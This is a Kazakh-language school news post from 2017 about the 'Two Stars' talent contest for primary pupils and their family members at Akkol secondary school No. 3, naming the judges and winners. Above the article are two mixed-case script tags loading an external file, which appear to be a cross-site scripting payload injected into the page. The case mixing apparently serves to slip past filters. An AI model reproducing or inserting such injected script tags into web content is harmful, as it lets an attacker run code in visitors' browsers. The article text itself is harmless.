<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

13.04.2017

                            «Екі жұлдыз» байқауы.

Наурыз мерекесі  қарсаңында №3 Ақкөл орта мектебінің қабырғасында бастауыш сыныптар арасында «Екі жұлдыз» өнерпаздар сайысы өтті. Сайыстың  шарты бойынша оқушы өзінің отбасы мүшесімен  қатысып,бірі-халық әні,екіншісі-өздерінің таңдауы бойынша орындауын талап етті.Бес жұп ортаға шығып,өнерлерін  көрсетті.Әр топ байқаудың шартын орындауға тырысты. Музыкалық мектебінің аға ұстазы-Бөжен Құрметбек әділқазылардың бас мүшесі болып тағайындалды. Әдіқазылардың әділ бағаларымен  І орынды 3«Ә» сынып оқушысы-Шәкірт Асыл және анасы-Гүлден Қайриденқызы  мен  2 «В» сынып оқушысы Алдабергенов Ғалымжан және ағасы Төлеби Әбілжанұлы тең бөліп берді. ІІ орын ды- 2«А» сыныбындағы Айдарбеков Арман және анасы-Ә. Қалдарбекқызы иеленді.Ал ІІІ орында Ермекбай Ерсұлтан 3«А» және анасы-А.Өжеке мен  Қарымсақов Несібелі 4«Ә»  және анасы- Г.Хатамуллақызы .Өнерпаз отбасылар мақтау қағазымен,сыйлықтармен марапатталды.Құттықтау сөзі мектеп директоры- Е.Ж.Қайыржановқа берілді. «Өнерлі өрге жүзеді»  демекші,алғаш қадамын басқан бұл іс-шара жылда өзінің жалғасын тауып,дамиды деген басшының алдағы уақыттағы ұсынысын ұжым қолдауда. 

                                   Бастауыш  сыныптар  әдістемелік бірлестігі.

Просмотров: 434


Пікір қосу



Деректерді қолтаңбаға қосу